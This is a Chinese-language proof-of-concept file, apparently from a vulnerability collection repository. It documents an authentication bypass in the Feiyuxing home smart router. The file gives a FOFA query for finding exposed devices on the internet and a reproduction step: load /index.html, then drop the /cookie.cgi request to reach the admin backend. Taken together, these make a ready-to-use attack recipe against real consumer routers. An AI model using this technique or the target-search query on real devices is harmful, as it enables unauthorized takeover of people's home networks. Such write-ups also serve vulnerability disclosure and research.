POC00/飞鱼星家用智能路由存在权限绕过漏洞.md

26 lines
877 B
Markdown
Raw Permalink Normal View History

2025-04-02 22:36:18 +08:00
# 飞鱼星家用智能路由存在权限绕过漏洞
# 一、漏洞详情
飞鱼星家用智能路由存在权限绕过漏洞
# 二、影响版本
+ 飞鱼星家用智能路由
# 三、资产测绘
+ fofa`title="飞鱼星家用智能路由"`
![1719500481297-cc6eb011-dc89-4927-9a7d-f1cda4f19459.png](./img/Y8HpEzdRmOBnMfKt/1719500481297-cc6eb011-dc89-4927-9a7d-f1cda4f19459-130632.png)
# 四、漏洞复现
```plain
/index.html
```
看见/cookie.cgi时丢弃即可进入后台
![1719498557012-c056c25e-abfa-4699-a939-ee754e115eb8.jpeg](./img/Y8HpEzdRmOBnMfKt/1719498557012-c056c25e-abfa-4699-a939-ee754e115eb8-380445.jpeg)![1719500276585-2ee27808-7c21-41af-91fd-53a76c11fb15.png](./img/Y8HpEzdRmOBnMfKt/1719500276585-2ee27808-7c21-41af-91fd-53a76c11fb15-759001.png)
> 更新: 2024-09-03 14:56:23
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uuo3rmxg1tggqqrb>